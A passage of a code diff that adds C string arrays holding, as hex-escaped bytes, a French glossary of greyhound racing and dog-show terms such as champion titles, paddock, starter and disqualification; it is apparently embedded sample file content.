+"\x63\x6c\x61\x73\x73\xe9\x20\x65\x6e\x20\x43\x20\x6f\x75\x20\x61"
+"\x79\x61\x6e\x74\x20\x64\x65\x20\x31\x37\x20\xe0\x20\x31\x30\x20"
+"\x70\x6f\x69\x6e\x74\x73\x20\x70\x6f\x75\x72\x20\x6c\x61\x20\x50"
+"\x56\x4c\x2e\x0d\x0d\x09\x41\x73\x73\x65\x7a\x20\x42\x6f\x6e\x20"
+"\x3a\x0d\x4c\xe9\x76\x72\x69\x65\x72\x20\x63\x6c\x61\x73\x73\xe9"
+"\x20\x65\x6e\x20\x44\x2e\x0d\x0d\x09\x49\x6e\x74\x65\x72\x6e\x61"
+"\x74\x69\x6f\x6e\x61\x6c\x20\x3a\x0d\x4c\xe9\x76\x72\x69\x65\x72"
+"\x20\x61\x79\x61\x6e\x74\x20\x65\x66\x66\x65\x63\x74\x75\xe9\x20"
+"\x75\x6e\x20\x70\x61\x72\x63\x6f\x75\x72\x73\x20\x70\x6c\x75\x73"
+"\x20\x72\x61\x70\x69\x64\x65\x20\x71\x75\x65\x20\x6c\x65\x20\x74"
+"\x65\x6d\x70\x73\x20\x64\x65\x20\x62\x61\x73\x65\x20\x65\x74\x20"
+"\x6d\x65\x73\x75\x72\xe9\x20\x70\x61\x72\x20\x75\x6e\x20\x70\x72"
+"\x6f\x63\xe9\x64\xe9\x20\xe9\x6c\x65\x63\x74\x72\x69\x71\x75\x65"
+"\x2e\x0d\x0d\x09\x43\x68\x61\x6d\x70\x69\x6f\x6e\x20\x64\x65\x20"
+"\x54\x72\x61\x76\x61\x69\x6c\x20\x45\x4e\x43\x20\x3a\x0d\x53\x75"
+"\x72\x20\x6c\x65\x20\x70\x65\x64\x69\x67\x72\x65\x65\x2c\x20\x69"
+"\x6c\x20\x79\x20\x61\x75\x72\x61\x20\xad\x63\x72\x69\x74\x20\x3a"
+"\x20\x43\x48\x54\x2e\x0d\x4c\xe9\x76\x72\x69\x65\x72\x20\x61\x79"
+"\x61\x6e\x74\x20\x72\xe9\x61\x6c\x69\x73\xe9\x20\x73\x75\x72\x20"
+"\x33\x20\x70\x69\x73\x74\x65\x73\x20\x64\x69\x66\x66\xe9\x72\x65"
+"\x6e\x74\x65\x73\x20\x3a\x0d\x20\x09\x2d\x20\x4c\x65\x20\x43\x41"
+"\x43\x54\x20\x64\x65\x20\x6c\x27\xe9\x70\x72\x65\x75\x76\x65\x20"
+"\x64\x65\x20\x43\x68\x61\x6d\x70\x69\x6f\x6e\x6e\x61\x74\x2c\x0d"
+"\x09\x2d\x20\x55\x6e\x20\x43\x41\x43\x54\x20\x65\x6e\x20\x53\x70"
+"\xe9\x63\x69\x61\x6c\x65\x2c\x0d\x20\x09\x2d\x20\x55\x6e\x20\x61"
+"\x75\x74\x72\x65\x20\x43\x41\x43\x54\x2c\x0d\x20\x09\x2d\x20\x55"
+"\x6e\x20\x45\x78\x63\x65\x6c\x6c\x65\x6e\x74\x0d\x09\x2d\x20\x55"
+"\x6e\x20\x54\x72\xe8\x73\x20\x42\x6f\x6e\x20\x65\x6e\x20\x65\x78"
+"\x70\x6f\x73\x69\x74\x69\x6f\x6e\x20\x65\x6e\x20\x46\x72\x61\x6e"
+"\x63\x65\x2e\x0d\x0d\x09\x43\x68\x61\x6d\x70\x69\x6f\x6e\x20\x64"
+"\x65\x20\x54\x72\x61\x76\x61\x69\x6c\x20\x50\x56\x4c\x20\x3a\x0d"
+"\x53\x75\x72\x20\x6c\x65\x20\x70\x65\x64\x69\x67\x72\x65\x65\x2c"
+"\x20\x69\x6c\x20\x79\x20\x61\x75\x72\x61\x20\xe9\x63\x72\x69\x74"
+"\x20\x3a\x20\x54\x50\x4f\x2e\x0d\x4c\xe9\x76\x72\x69\x65\x72\x20"
+"\x61\x79\x61\x6e\x74\x20\x72\xe9\x61\x6c\x69\x73\xe9\x20\x61\x76"
+"\x65\x63\x20\x33\x20\x6a\x75\x67\x65\x73\x20\x64\x69\x66\x66\xe9"
+"\x72\x65\x6e\x74\x73\x20\x3a\x0d\x20\x09\x2d\x20\x4c\x65\x20\x43"
+"\x41\x43\x50\x20\x64\x65\x20\x6c\x27\xe9\x70\x72\x65\x75\x76\x65"
+"\x20\x64\x65\x20\x43\x68\x61\x6d\x70\x69\x6f\x6e\x6e\x61\x74\x2c"
+"\x0d\x09\x2d\x20\x55\x6e\x20\x45\x78\x63\x65\x6c\x6c\x65\x6e\x74"
+"\x20\x65\x6e\x20\x53\x70\xe9\x63\x69\x61\x6c\x65\x2c\x0d\x20\x09"
+"\x2d\x20\x55\x6e\x20\x61\x75\x74\x72\x65\x20\x43\x41\x43\x50\x2c"
+"\x0d\x09\x2d\x20\x55\x6e\x20\x54\x72\xe8\x73\x20\x42\x6f\x6e\x20"
+"\x65\x6e\x20\x65\x78\x70\x6f\x73\x69\x74\x69\x6f\x6e\x20\x65\x6e"
+"\x20\x46\x72\x61\x6e\x63\x65\x2e\x0d\x0d\x4c\x61\x20\x64\x65\x6d"
+"\x61\x6e\x64\x65\x20\x64\x92\x68\x6f\x6d\x6f\x6c\x6f\x67\x61\x74"
+"\x69\x6f\x6e\x20\x64\x65\x76\x72\x61\x20\xea\x74\x72\x65\x20\x72"
+"\xe9\x61\x6c\x69\x73\xe9\x65\x20\x6f\x62\x6c\x69\x67\x61\x74\x6f"
+"\x69\x72\x65\x6d\x65\x6e\x74\x20\x64\x61\x6e\x73\x20\x6c\x65\x73"
+"\x20\x36\x20\x6d\x6f\x69\x73\x20\x71\x75\x69\x20\x73\x75\x69\x76"
+"\x65\x6e\x74\x20\x6c\x92\x6f\x62\x74\x65\x6e\x74\x69\x6f\x6e\x20"
+"\x64\x65\x20\x63\x65\x73\x20\x65\x78\x69\x67\x65\x6e\x63\x65\x73"
+"\x20\x61\x75\x73\x73\x69\x20\x62\x69\x65\x6e\x20\x70\x6f\x75\x72"
+"\x20\x6c\x61\x20\x50\x56\x4c\x20\x71\x75\x65\x20\x70\x6f\x75\x72"
+"\x20\x6c\x92\x45\x4e\x43\x2e\x0d\x0d\x09\x43\x68\x61\x6d\x70\x69"
+"\x6f\x6e\x20\x64\x65\x20\x56\x69\x74\x65\x73\x73\x65\x20\x3a\x0d"
+"\x53\x75\x72\x20\x6c\x65\x20\x70\x65\x64\x69\x67\x72\x65\x65\x2c"
+"\x20\x69\x6c\x20\x79\x20\x61\x20\xe9\x63\x72\x69\x74\x20\x43\x48"
+"\x56\x69\x2e\x0d\x43\x65\x20\x73\x6f\x6e\x74\x20\x6c\x65\x73\x20"
+"\x76\x61\x69\x6e\x71\x75\x65\x75\x72\x73\x20\x64\x65\x73\x20\x43"
+"\x68\x61\x6d\x70\x69\x6f\x6e\x6e\x61\x74\x73\x20\x64\x65\x20\x74"
+"\x79\x70\x65\x20\x55\x49\x43\x4c\x20\x6f\x72\x67\x61\x6e\x69\x73"
+"\xe9\x73\x20\x65\x6e\x20\x46\x72\x61\x6e\x63\x65\x20\x70\x65\x6e"
+"\x64\x61\x6e\x74\x20\x75\x6e\x65\x20\x64\x69\x7a\x61\x69\x6e\x65"
+"\x20\x64\x92\x61\x6e\x6e\xe9\x65\x2e\x0d\x0d\x09\x4c\x61\x75\x72"
+"\xe9\x61\x74\x20\x53\x74\x61\x6e\x64\x61\x72\x64\x20\x50\x65\x72"
+"\x66\x6f\x72\x6d\x61\x6e\x63\x65\x73\x20\x4c\xe9\x76\x72\x69\x65"
+"\x72\x73\x20\x3a\x0d\x20\x53\x75\x72\x20\x6c\x65\x20\x70\x65\x64"
+"\x69\x67\x72\x65\x65\x2c\x20\x69\x6c\x20\x79\x20\x61\x20\xe9\x63"
+"\x72\x69\x74\x20\x3a\x20\x43\x48\x20\x4c\x53\x50\x0d\x4c\x65\x20"
+"\x6c\xe9\x76\x72\x69\x65\x72\x20\x70\x6f\x75\x72\x72\x61\x20\x70"
+"\x72\xe9\x74\x65\x6e\x64\x72\x65\x20\xe0\x20\x75\x6e\x20\x73\x65"
+"\x75\x6c\x20\x74\x69\x74\x72\x65\x20\x64\x65\x20\x4c\x53\x50\x20"
+"\x71\x75\x69\x20\x73\x65\x72\x61\x20\x6f\x62\x74\x65\x6e\x75\x20"
+"\x73\x6f\x69\x74\x20\x70\x61\x72\x20\x6c\x65\x20\x72\x61\x63\x69"
+;
+char file_part2[]=
+"\x6e\x67\x2c\x20\x73\x6f\x69\x74\x20\x70\x61\x72\x20\x6c\x61\x20"
+"\x50\x56\x4c\x2c\x20\x73\x6f\x69\x74\x20\x6d\x69\x78\x74\x65\x2e"
+"\x0d\x0d\x43\x6f\x75\x72\x73\x65\x3a\x0d\x43\x65\x20\x73\x6f\x6e"
+"\x74\x20\x6c\x65\x73\x20\x6c\xe9\x76\x72\x69\x65\x72\x73\x20\x61"
+"\x79\x61\x6e\x74\x20\x6f\x62\x74\x65\x6e\x75\x20\xe0\x20\x6c\x61"
+"\x20\x66\x6f\x69\x73\x20\x64\x65\x20\x67\x72\x61\x6e\x64\x73\x20"
+"\x72\xe9\x73\x75\x6c\x74\x61\x74\x73\x20\x65\x6e\x20\x45\x78\x70"
+"\x6f\x73\x69\x74\x69\x6f\x6e\x20\x28\x61\x75\x20\x6d\x6f\x69\x6e"
+"\x73\x20\x31\x20\x43\x41\x43\x53\x20\x65\x74\x20\x31\x20\x52\x43"
+"\x41\x43\x53\x29\x20\x65\x74\x20\x65\x6e\x20\x63\x6f\x75\x72\x73"
+"\x65\x20\x28\x61\x75\x20\x6d\x6f\x69\x6e\x73\x20\x32\x20\x65\x78"
+"\x63\x65\x6c\x6c\x65\x6e\x74\x73\x20\x65\x74\x20\x75\x6e\x20\x63"
+"\x68\x72\x6f\x6e\x6f\x20\xe9\x6c\x65\x63\x74\x72\x69\x71\x75\x65"
+"\x29\x20\x73\x65\x6c\x6f\x6e\x20\x62\x61\x72\xe8\x6d\x65\x20\x63"
+"\x6f\x6d\x70\x65\x6e\x73\x61\x74\x65\x75\x72\x2e\x0d\x45\x78\x20"
+"\x3a\x20\x32\x20\x65\x78\x63\x65\x6c\x6c\x65\x6e\x74\x73\x20\x65"
+"\x74\x20\x70\x61\x72\x74\x69\x63\x69\x70\x61\x74\x69\x6f\x6e\x20"
+"\x47\x72\x61\x6e\x64\x20\x50\x72\x69\x78\x20\x53\x43\x43\x20\x73"
+"\x75\x66\x66\x69\x73\x65\x6e\x74\x20\x65\x6e\x20\x63\x6f\x75\x72"
+"\x73\x65\x20\xe0\x20\x75\x6e\x20\x74\x69\x74\x75\x6c\x61\x69\x72"
+"\x65\x20\x64\x65\x20\x32\x20\x43\x41\x43\x49\x42\x2e\x0d\x0d\x50"
+"\x6f\x75\x72\x73\x75\x69\x74\x65\x3a\x0d\x09\x4c\x65\x73\x20\x6c"
+"\xe9\x76\x72\x69\x65\x72\x73\x20\x64\x6f\x69\x76\x65\x6e\x74\x20"
+"\x61\x76\x6f\x69\x72\x20\x6f\x62\x74\x65\x6e\x75\x20\x6c\x65\x73"
+"\x20\x6d\xea\x6d\x65\x73\x20\x72\xe9\x73\x75\x6c\x74\x61\x74\x73"
+"\x20\x65\x6e\x20\x42\x65\x61\x75\x74\xe9\x20\x71\x75\x65\x20\x63"
+"\x69\x2d\x64\x65\x73\x73\x75\x73\x2c\x20\x69\x6c\x73\x20\x64\x65"
+"\x76\x72\x6f\x6e\x74\x20\x65\x6e\x20\x6f\x75\x74\x72\x65\x20\x61"
+"\x76\x6f\x69\x72\x20\x61\x75\x20\x6d\x69\x6e\x69\x6d\x75\x6d\x20"
+"\x64\x65\x75\x78\x20\x45\x78\x63\x65\x6c\x6c\x65\x6e\x74\x73\x20"
+"\x65\x6e\x20\x50\x56\x4c\x20\x61\x69\x6e\x73\x69\x20\x71\x75\x27"
+"\x75\x6e\x20\x63\x68\x72\x6f\x6e\x6f\x6d\xe9\x74\x72\x61\x67\x65"
+"\x20\x61\x74\x74\x65\x73\x74\x61\x6e\x74\x20\x71\x75\x27\x69\x6c"
+"\x73\x20\x6f\x6e\x74\x20\x65\x66\x66\x65\x63\x74\x75\xe9\x20\x75"
+"\x6e\x20\x74\x65\x6d\x70\x73\x20\x64\x65\x20\x41\x20\x73\x75\x72"
+"\x20\x61\x75\x20\x6d\x6f\x69\x6e\x73\x20\x37\x35\x20\x6d\xe8\x74"
+"\x72\x65\x73\x2e\x0d\x0d\x4d\x69\x78\x74\x65\x3a\x0d\x09\x4c\x65"
+"\x20\x74\x69\x74\x72\x65\x20\x70\x6f\x75\x72\x72\x61\x20\xea\x74"
+"\x72\x65\x20\x6f\x62\x74\x65\x6e\x75\x20\x61\x76\x65\x63\x20\x64"
+"\x65\x73\x20\x72\xe9\x73\x75\x6c\x74\x61\x74\x73\x20\x65\x6e\x20"
+"\x45\x4e\x43\x20\x65\x74\x20\x65\x6e\x20\x50\x56\x4c\x2e\x0d\x0d"
+"\x09\x47\x72\x61\x6e\x64\x20\x50\x72\x69\x78\x20\x64\x65\x20\x6c"
+"\x61\x20\x53\x43\x43\x20\x3a\x20\x0d\x43\x6f\x75\x72\x73\x65\x20"
+"\x72\xe9\x73\x65\x72\x76\xe9\x65\x20\x61\x75\x78\x20\x6c\xe9\x76"
+"\x72\x69\x65\x72\x73\x20\x74\x69\x74\x75\x6c\x61\x69\x72\x65\x73"
+"\x20\x64\x65\x20\x72\xe9\x73\x75\x6c\x74\x61\x74\x73\x20\x65\x6e"
+"\x20\x65\x78\x70\x6f\x73\x69\x74\x69\x6f\x6e\x73\x20\x61\x76\x65"
+"\x63\x20\x61\x75\x20\x6d\x69\x6e\x69\x6d\x75\x6d\x20\x52\x43\x41"
+"\x43\x53\x20\x2b\x20\x75\x6e\x20\x65\x78\x63\x65\x6c\x6c\x65\x6e"
+"\x74\x2c\x20\x61\x69\x6e\x73\x69\x20\x71\x75\x92\x75\x6e\x20\x65"
+"\x78\x63\x65\x6c\x6c\x65\x6e\x74\x20\x6f\x75\x20\x64\x65\x75\x78"
+"\x20\x74\x72\xe8\x73\x20\x62\x6f\x6e\x20\x65\x6e\x20\x45\x4e\x43"
+"\x2e\x20\x4c\x61\x20\x76\x69\x63\x74\x6f\x69\x72\x65\x20\x65\x73"
+"\x74\x20\x70\x6f\x72\x74\xe9\x65\x20\x61\x75\x20\x70\x65\x64\x69"
+"\x67\x72\x65\x65\x20\x28\x47\x50\x58\x29\x2e\x20\x0d\x0d\x09\x43"
+"\x68\x61\x6d\x70\x69\x6f\x6e\x6e\x61\x74\x20\x64\x27\x45\x75\x72"
+"\x6f\x70\x65\x20\x65\x74\x20\x64\x75\x20\x4d\x6f\x6e\x64\x65\x20"
+"\x64\x65\x20\x63\x6f\x75\x72\x73\x65\x20\x3a\x0d\x4f\x72\x67\x61"
+"\x6e\x69\x73\x61\x74\x69\x6f\x6e\x20\x61\x6e\x6e\x75\x65\x6c\x6c"
+"\x65\x20\x64\x65\x20\x6c\x61\x20\x63\x6f\x6e\x66\x72\x6f\x6e\x74"
+"\x61\x74\x69\x6f\x6e\x20\x64\x65\x73\x20\x6d\x65\x69\x6c\x6c\x65"
+"\x75\x72\x73\x20\x6c\xe9\x76\x72\x69\x65\x72\x73\x20\x73\xe9\x6c"
+"\x65\x63\x74\x69\x6f\x6e\x6e\xe9\x73\x20\x70\x61\x72\x20\x63\x68"
+"\x61\x71\x75\x65\x20\x70\x61\x79\x73\x20\x6d\x65\x6d\x62\x72\x65"
+"\x2c\x20\x70\x61\x72\x20\x72\x61\x63\x65\x20\x65\x74\x20\x70\x61"
+"\x72\x20\x73\x65\x78\x65\x2e\x0d\x0d\x09\x43\x68\x61\x6d\x70\x69"
+"\x6f\x6e\x6e\x61\x74\x20\x64\x65\x20\x46\x72\x61\x6e\x63\x65\x20"
+"\x64\x65\x20\x50\x56\x4c\x20\x3a\x0d\x45\x70\x72\x65\x75\x76\x65"
+"\x20\x72\xe9\x63\x6f\x6d\x70\x65\x6e\x73\x61\x6e\x74\x20\x6c\x65"
+"\x20\x6d\x65\x69\x6c\x6c\x65\x75\x72\x20\x6c\xe9\x76\x72\x69\x65"
+"\x72\x20\xe4\x6e\x20\x45\x50\x56\x4c\x2c\x20\x63\x68\x61\x71\x75"
+"\x65\x20\x61\x6e\x6e\xe9\x65\x2e\x0d\x0d\x09\x42\x72\x61\x73\x73"
+"\x6f\x6b\x20\x3a\x20\x0d\x50\x6c\x6f\x6e\x67\x65\x6f\x6e\x20\x64"
+"\x75\x20\x6c\xe9\x76\x72\x69\x65\x72\x20\x73\x75\x72\x20\x6c\x65"
+"\x20\x6c\x65\x75\x72\x72\x65\x20\xe0\x20\x6c\x27\x61\x72\x72\x69"
+"\x76\xe9\x65\x2c\x20\x72\x61\x70\x70\x65\x6c\x61\x6e\x74\x20\x6c"
+"\x61\x20\x74\x65\x63\x68\x6e\x69\x71\x75\x65\x20\x65\x6d\x70\x6c"
+"\x6f\x79\xe9\x65\x20\x70\x6f\x75\x72\x20\x74\x75\x65\x72\x20\x75"
+"\x6e\x20\x61\x70\x70\xe2\x74\x20\x76\x69\x76\x61\x6e\x74\x2e\x0d"
+"\x0d\x09\x41\x74\x74\x61\x71\x75\x65\x20\x3a\x0d\x4d\x6f\x75\x76"
+"\x65\x6d\x65\x6e\x74\x20\x64\x75\x20\x6c\xe9\x76\x72\x69\x65\x72"
+"\x20\x76\x65\x72\x73\x20\x75\x6e\x20\x63\x6f\x6e\x63\x75\x72\x72"
+"\x65\x6e\x74\x2c\x20\x61\x75\x20\x63\x6f\x75\x72\x73\x20\x64\x75"
+"\x71\x75\x65\x6c\x20\x6c\x65\x20\x66\x61\x75\x74\x69\x66\x20\x71"
+"\x75\x69\x74\x74\x65\x20\x6c\x65\x20\x6c\x65\x75\x72\x72\x65\x20"
+"\x64\x65\x73\x20\x79\x65\x75\x78\x2e\x20\x4c\x27\x61\x74\x74\x61"
+"\x71\x75\x65\x20\x6e\x65\x20\x73\x69\x67\x6e\x69\x66\x69\x65\x20"
+"\x6e\x75\x6c\x6c\x65\x6d\x65\x6e\x74\x20\x75\x6e\x65\x20\x76\x6f"
+"\x6c\x6f\x6e\x74\xe9\x20\x61\x67\x72\x65\x73\x73\x69\x76\x65\x2c"
+"\x20\x73\x6f\x75\x76\x65\x6e\x74\x20\x64\x75\x20\x6a\x65\x75\x2e"
+"\x0d\x0d\x09\x42\x6f\x75\x73\x63\x75\x6c\x61\x64\x65\x20\x3a\x0d"
+"\x4d\x6f\x75\x76\x65\x6d\x65\x6e\x74\x20\x64\x75\x20\x6c\xe9\x76"
+"\x72\x69\x65\x72\x20\x71\x75\x69\x20\x73\x61\x6e\x73\x20\x71\x75"
+"\x69\x74\x74\x65\x72\x20\x6c\x65\x20\x6c\x65\x75\x72\x72\x65\x20"
+"\x64\x65\x73\x20\x79\x65\x75\x78\x20\x65\x73\x74\x20\x64\xe9\x70"
+"\x6f\x72\x74\xe9\x20\x6f\x75\x20\x73\x65\x20\x66\x61\x69\x74\x20"
+"\x64\x65\x20\x6c\x61\x20\x70\x6c\x61\x63\x65\x20\xe0\x20\x63\x6f"
+"\x75\x70\x73\x20\x64\x27\xe9\x70\x61\x75\x6c\x65\x20\x6f\x75\x20"
+"\x64\x65\x20\x68\x61\x6e\x63\x68\x65\x2e\x20\x4c\x61\x20\x62\x6f"
+"\x75\x73\x63\x75\x6c\x61\x64\x65\x20\x6e\x27\x65\x73\x74\x20\x70"
+"\x61\x73\x20\x75\x6e\x20\x61\x63\x74\x65\x20\x66\x61\x75\x74\x69"
+"\x66\x2c\x20\x6d\xea\x6d\x65\x20\x73\x69\x20\x65\x6c\x6c\x65\x20"
+"\x70\x72\x6f\x76\x6f\x71\x75\x65\x20\x6c\x61\x20\x63\x68\x75\x74"
+"\x65\x20\x64\x75\x20\x62\x6f\x75\x73\x63\x75\x6c\xe9\x2e\x0d\x0d"
+"\x09\x4f\x75\x76\x72\x65\x75\x72\x20\x3a\x0d\x4c\xe9\x76\x72\x69"
+"\x65\x72\x20\x6e\x6f\x6e\x20\x65\x6e\x67\x61\x67\xe9\x20\x71\x75"
+"\x69\x20\x6f\x75\x76\x72\x65\x20\x6c\x61\x20\x72\xe9\x75\x6e\x69"
+"\x6f\x6e\x20\x70\x6f\x75\x72\x20\x76\xe9\x72\x69\x66\x69\x63\x61"
+"\x74\x69\x6f\x6e\x20\x64\x75\x20\x6d\x61\x74\xe9\x72\x69\x65\x6c"
+"\x2e\x0d\x0d\x09\x4f\x62\x73\x65\x72\x76\x61\x74\x65\x75\x72\x73"
+"\x20\x64\x65\x20\x76\x69\x72\x61\x67\x65\x20\x3a\x0d\x41\x6e\x63"
+"\x69\x65\x6e\x6e\x65\x6d\x65\x6e\x74\x20\x43\x6f\x6d\x6d\x69\x73"
+"\x73\x61\x69\x72\x65\x2e\x0d\x50\x65\x72\x73\x6f\x6e\x6e\x65\x20"
+"\x61\x67\x72\xe9\xe9\x65\x20\x70\x61\x72\x20\x6c\x61\x20\x43\x2e"
+"\x4c\x2e\x20\x70\x61\x72\x6d\x69\x20\x64\x65\x73\x20\x70\x72\x6f"
+"\x70\x72\x69\xe9\x74\x61\x69\x72\x65\x73\x20\x65\x78\x70\xe9\x72"
+"\x69\x6d\x65\x6e\x74\xe9\x73\x20\x65\x74\x20\x71\x75\x69\x20\x73"
+"\x65\x20\x70\x6c\x61\x63\x65\x20\xe0\x20\x63\x68\x61\x71\x75\x65"
+"\x20\x76\x69\x72\x61\x67\x65\x73\x20\x70\x6f\x75\x72\x20\x64\x6f"
+"\x6e\x6e\x65\x72\x20\x73\x6f\x6e\x20\x61\x76\x69\x73\x20\x73\x75"
+"\x72\x20\x6c\x65\x20\x63\x6f\x6d\x70\x6f\x72\x74\x65\x6d\x65\x6e"
+"\x74\x20\x64\x75\x20\x6c\xe9\x76\x72\x69\x65\x72\x2e\x20\x4c\x65"
+"\x20\x6a\x75\x67\x65\x20\x65\x73\x74\x20\x6c\x69\x62\x72\x65\x20"
+"\x64\x65\x20\x73\x75\x69\x76\x72\x65\x20\x6f\x75\x20\x6e\x6f\x6e"
+"\x20\x73\x6f\x6e\x20\x61\x76\x69\x73\x20\x28\x63\x6f\x6d\x6d\x65"
+"\x20\x6c\x65\x20\x6a\x75\x67\x65\x20\x64\x65\x20\x74\x6f\x75\x63"
+"\x68\x65\x20\x65\x6e\x20\x66\x6f\x6f\x74\x62\x61\x6c\x6c\x20\x6f"
+"\x75\x20\x65\x6e\x20\x72\x75\x67\x62\x79\x29\x2e\x0d\x51\x75\x61"
+"\x6e\x64\x20\x69\x6c\x20\x61\x20\x76\x75\x20\x75\x6e\x65\x20\x66"
+"\x61\x75\x74\x65\x2c\x20\x69\x6c\x20\x6c\xe8\x76\x65\x20\x6c\x65"
+"\x20\x62\x72\x61\x73\x20\x6f\x75\x20\x75\x6e\x20\x66\x61\x6e\x69"
+"\x6f\x6e\x2e\x20\x0d\x0d\x09\x50\x61\x64\x64\x6f\x63\x6b\x3a\x20"
+"\x0d\x5a\x6f\x6e\x65\x20\x64\xe9\x6c\x69\x6d\x69\x74\xe9\x65\x20"
+"\x70\x61\x72\x20\x64\x65\x73\x20\x63\x6f\x72\x64\x61\x67\x65\x73"
+"\x20\x57\xf9\x20\x6c\x65\x73\x20\x6c\xe9\x76\x72\x69\x65\x72\x73"
+"\x20\x73\x6f\x6e\x74\x20\x73\x6f\x75\x6d\x69\x73\x20\x61\x75\x78"
+"\x20\x63\x6f\x6e\x74\x72\xf4\x6c\x65\x73\x20\x74\x65\x63\x68\x6e"
+"\x69\x71\x75\x65\x73\x20\x65\x74\x20\x61\x74\x74\x65\x6e\x64\x65"
+"\x6e\x74\x20\x6c\x27\x6f\x72\x64\x72\x65\x20\x64\x27\x61\x6c\x6c"
+"\x65\x72\x20\x61\x75\x78\x20\x62\x6f\x69\x74\x65\x73\x20\x64\x65"
+"\x20\x64\xe9\x70\x61\x72\x74\x2e\x0d\x0d\x09\x53\x74\x61\x72\x74"
+"\x65\x72\x3a\x0d\x50\x65\x72\x73\x6f\x6e\x6e\x65\x20\x71\x75\x69"
+"\x20\x64\x6f\x6e\x6e\x65\x20\x6c\x65\x20\x64\xe9\x70\x61\x72\x74"
+"\x20\x65\x6e\x20\x6f\x75\x76\x72\x61\x6e\x74\x20\x6c\x65\x73\x20"
+"\x62\x6f\x69\x74\x65\x2e\x0d\x0d\x09\x4c\x65\x75\x72\x72\x69\x73"
+"\x74\x65\x3a\x0d\x52\x65\x73\x70\x6f\x6e\x73\x61\x62\x6c\x65\x20"
+"\x64\x65\x20\x6c\x61\x20\x63\x6f\x6e\x64\x75\x69\x74\x65\x20\x64"
+"\x75\x20\x6c\x65\x75\x72\x72\x65\x20\x65\x6e\x20\x52\x61\x63\x69"
+"\x6e\x67\x2e\x0d\x0d\x09\x43\x6f\x6e\x64\x75\x63\x74\x65\x75\x72"
+"\x20\x74\x65\x63\x68\x6e\x69\x71\x75\x65\x20\x3a\x0d\x52\x65\x73"
+"\x70\x6f\x6e\x73\x61\x62\x6c\x65\x20\x64\x65\x20\x6c\x61\x20\x63"
+"\x6f\x6e\x64\x75\x69\x74\x65\x20\x64\x75\x20\x6c\x65\x75\x72\x72"
+"\x65\x20\x65\x6e\x20\x45\x2e\x50\x2e\x56\x2e\x4c\x2e\x20\x0d\x53"
+"\x6f\x6e\x20\x72\xf4\x6c\x65\x20\x65\x73\x74\x20\x63\x6f\x6e\x73"
+"\x69\x64\xe9\x72\x61\x62\x6c\x65\x20\x65\x74\x20\x6c\x65\x73\x20"
+"\x63\x6f\x6e\x64\x69\x74\x69\x6f\x6e\x73\x20\x64\x65\x20\x6e\x6f"
+"\x6d\x69\x6e\x61\x74\x69\x6f\x6e\x20\x64\x65\x20\x70\x6c\x75\x73"
+"\x20\x65\x6e\x20\x70\x6c\x75\x73\x20\x73\xe9\x76\xe8\x72\x65\x73"
+"\x2e\x0d\x0d\x09\x41\x6d\x69\x63\x61\x6c\x65\x3a\x0d\x45\x70\x72"
+"\x65\x75\x76\x65\x20\x6e\x6f\x6e\x2d\x6f\x66\x66\x69\x63\x69\x65"
+"\x6c\x6c\x65\x20\x6f\x72\x67\x61\x6e\x69\x73\xe9\x65\x20\x70\x61"
+"\x72\x20\x75\x6e\x20\x63\x6c\x75\x62\x20\x61\x67\x72\xe9\xe9\x20"
+"\x73\x65\x6c\x6f\x6e\x20\x73\x6f\x6e\x20\x70\x72\x6f\x70\x72\x65"
+"\x20\x72\xe8\x67\x6c\x65\x6d\x65\x6e\x74\x20\x65\x74\x20\x70\x6f"
+"\x75\x76\x61\x6e\x74\x20\xea\x74\x72\x65\x20\x64\x6f\x74\xe9\x65"
+"\xa2\x64\x65\x20\x70\x72\x69\x78\x20\x65\x6e\x20\x65\x73\x70\xe8"
+"\x63\x65\x73\x2e\x20\x4c\x61\x20\x73\x65\x75\x6c\x65\x20\x63\x6f"
+"\x6e\x74\x72\x61\x69\x6e\x74\x65\x20\x65\x73\x74\x20\x64\x27\x69"
+"\x6e\x66\x6f\x72\x6d\x65\x72\x20\x6c\x61\x20\x43\x2e\x4c\x2e\x20"
+"\x65\x74\x20\x6c\x61\x20\x53\x6f\x63\x69\xe9\x74\xe9\x20\x43\x61"
+"\x6e\x69\x6e\x65\x20\x6c\x6f\x63\x61\x6c\x65\x2e\x20\x4f\x6e\x20"
+"\x6e\x65\x20\x70\x65\x75\x74\x20\x70\x61\x73\x20\x6f\x72\x67\x61"
+"\x6e\x69\x73\x65\x72\x20\x64\x27\x61\x6d\x69\x63\x61\x6c\x65\x20"
+"\x6c\x65\x20\x6a\x6f\x75\x72\x20\x64\x27\x75\x6e\x65\x20\xe9\x70"
+"\x72\x65\x75\x76\x65\x20\x70\x72\x6f\x74\xe9\x67\xe9\x65\x20\x6f"
+"\x75\x20\xff\x27\x69\x6c\x20\x79\x20\x61\x20\x20\x72\x69\x73\x71"
+"\x75\x65\x20\x64\x65\x20\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x63"
+"\x65\x72\x20\x75\x6e\x65\x20\xe9\x70\x72\x65\x75\x76\x65\x20\x6f"
+"\x66\x66\x69\x63\x69\x65\x6c\x6c\x65\x2e\x0d\x0d\x09\x54\x72\x6f"
+"\x70\x68\xe9\x65\x2c\x20\x44\x65\x72\x62\x79\x2e\x2e\x2e\x0d\x41"
+"\x70\x70\x65\x6c\x6c\x61\x74\x69\x6f\x6e\x73\x20\x70\x72\x6f\x70"
+"\x72\x65\x73\x20\xe0\x20\x75\x6e\x65\x20\x61\x6d\x69\x63\x61\x6c"
+"\x65\x20\x64\x65\x20\x43\x6c\x75\x62\x20\x6f\x75\x20\x64\x65\x20"
+"\x70\x72\x6f\x70\x72\x69\xe9\x74\x61\x69\x72\x65\x73\x20\x70\x6f"
+"\x75\x72\x20\x6d\x69\x65\x75\x78\x20\x72\x65\x74\x65\x6e\x69\x72"
+"\x20\x6c\x27\x61\x74\x74\x65\x6e\x74\x69\x6f\x6e\x2e\x0d\x0d\x09"
+"\x53\x75\x73\x70\x65\x6e\x73\x69\x6f\x6e\x3a\x0d\x46\x61\x75\x74"
+"\x65\x20\x6c\xe9\x67\xe8\x72\x65\x20\x70\x61\x72\x20\x6d\x61\x6e"
+"\x71\x75\x65\x20\x64\x27\x61\x72\x64\x65\x75\x72\x2e\x0d\x0d\x09"
+"\x44\x69\x73\x71\x75\x61\x6c\x69\x66\x69\x63\x61\x74\x69\x6f\x6e"
+"\x3a\x0d\x46\x61\x75\x74\x65\x20\x67\x72\x61\x76\x65\x20\x6e\x75"
+"\x69\x73\x61\x6e\x74\x20\xe0\x20\x61\x75\x74\x72\x75\x69\x20\x65"
+"\x74\x20\x69\x6e\x74\x65\x72\x64\x69\x74\x65\x20\x70\x61\x72\x20"
